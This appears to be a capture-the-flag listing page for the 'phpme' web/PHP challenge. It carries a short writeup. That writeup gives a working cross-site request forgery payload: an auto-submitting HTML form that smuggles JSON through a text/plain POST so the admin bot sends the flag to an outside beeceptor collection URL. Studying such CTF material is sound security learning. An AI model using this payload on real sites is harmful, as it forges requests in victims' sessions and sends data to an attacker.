Points: 469

Tags: web php 

Poll rating:

Writeups

ActionRatingAuthor team
Read writeup
not rated
Crusaders of Rust
Read writeup
5.0
Byte Lounge
Read writeup
5.0
NUSHmallows
Read writeup
4.0
.SoloCup
You need to authenticate and join a team to post writeups SecureFocusAug. 23, 2021, 7:10 a.m.

The Admin bot will visit your page which will automatically POST to the required JSON to phpme.be.ax through HTML form. In return it will send the flag to URL provided.

<body onload="document.forms[0].submit()">
<form method='POST' enctype='text/plain' action="https://phpme.be.ax/">
<input name='{ "yep": "yep yep yep", "url": "https://XXXXX.free.beeceptor.com", "=":" ' value='"}'>
<input type="Submit">
</form>
</body>